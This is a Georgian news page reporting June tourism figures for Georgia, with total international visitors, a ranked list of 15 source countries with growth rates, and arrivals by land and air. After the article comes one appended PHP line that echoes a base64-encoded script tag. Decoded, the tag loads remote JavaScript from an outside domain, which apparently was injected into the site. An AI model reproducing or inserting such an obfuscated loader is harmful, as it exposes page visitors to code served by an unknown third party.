celsiusi
ავერსი საქკაბელი
ტურიზმის ეროვნული ადმინისტრაციის ინფორმაციით, გასულ თვეში ქვეყანაში 387 781 საერთაშორისო ვიზიტორის ვიზიტი შედგა, რაც წინა წელთან შედარებით 164%-ით მეტია, თუმცა პანდემიამდელ პერიოდთან შედარებით ვიზიტორთა ეს ნაკადი 47%-ით ნაკლებია.
 
სტატისტიკური მონაცემებით, ივნისში ყველაზე მეტი ვიზიტორი რუსეთიდან შემოვიდა - 90 239 მოქალაქე, რაც წინა წელთან შედარებით 503%-ით მეტია.
 
15 ქვეყანა, საიდანაც ივნისში საქართველოში შემოვიდნენ:
 
1) რუსეთი - 90 239 ვიზიტორი, ზრდა წინა წელთან 503%
2) თურქეთი - 62 192 ვიზიტორი, ზრდა წინა წელთან 110%
3) სომხეთი - 61 974 ვიზიტორი, ზრდა წინა წელთან 365%
4) საქართველო (არარეზიდენტი) - 22 143 ვიზიტორი, ზრდა წინა წელთან 104%
5) ისრაელი - 20 555 ვიზიტორი, ზრდა წინა წელთან 30%
6) უკრაინა - 15 273 ვიზიტორი, ზრდა წინა წელთან -1%
7) ყაზახეთი - 14 368 ვიზიტორი, ზრდა წინა წელთან 96%
8) აზერბაიჯანი - 13 067 ვიზიტორი, ზრდა წინა წელთან 89%
9) ბელარუსი - 12 284 ვიზიტორი, ზრდა წინა წელთან 222%
10) საუდის არაბეთი - 10 372 ვიზიტორი, ზრდა წინა წელთან 72%
11) ირანი - 9 454 ვიზიტორი, ზრდა წინა წელთან 599%
12) უზბეკეთი - 5 697 ვიზიტორი, ზრდა წინა წელთან 106%
13) გერმანია - 5 557 ვიზიტორი, ზრდა წინა წელთან 240%
14) პოლონეთი - 3 907 ვიზიტორი, ზრდა წინა წელთან 118%
15) აშშ - 3 195 ვიზიტორი, ზრდა წინა წელთან 87%
 
ივნისში საქართველოში ყველაზე მეტი - 253,000 ვიზიტორი სახმელეთო გზით, 131,500 კი საავიაციო გზით შემოვიდა.
839
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");